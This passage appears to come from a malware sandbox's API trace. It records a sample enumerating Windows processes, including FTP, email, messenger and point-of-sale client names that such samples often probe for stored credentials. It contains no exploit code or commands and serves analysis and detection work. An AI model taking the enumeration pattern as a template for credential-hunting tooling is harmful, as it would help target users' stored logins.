th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0212.693] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.695] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0212.697] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0212.698] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0212.700] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.702] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.704] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0212.705] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.707] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.708] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.710] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.712] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.714] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.744] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.746] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0212.747] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0212.749] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.751] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0212.752] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.754] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0212.756] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0212.757] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0212.759] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0212.761] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0212.763] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0212.764] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.766] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0212.768] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0212.769] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0212.771] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0212.773] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.775] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0212.777] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0212.778] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0212.783] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0212.785] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0212.787] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0212.788] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0212.790] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0212.792] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0212.793] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0212.796] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0212.798] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0212.799] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0212.801] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0212.803] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0212.804] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0212.806] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0212.808] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0212.810] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0212.820] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0212.822] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0212.824] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0212.836] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0212.839] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0212.841] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0212.843] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0212.845] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0212.847] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0212.849] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0212.852] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0212.854] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0212.856] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0212.858] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0212.860] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0212.862] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0212.875] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0212.879] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0212.881] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0212.891] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0212.893] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0212.897] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0212.898] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0212.901] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0212.902] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0212.904] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0212.906] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0212.908] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0212.911] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0212.913] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0212.915] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0212.917] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 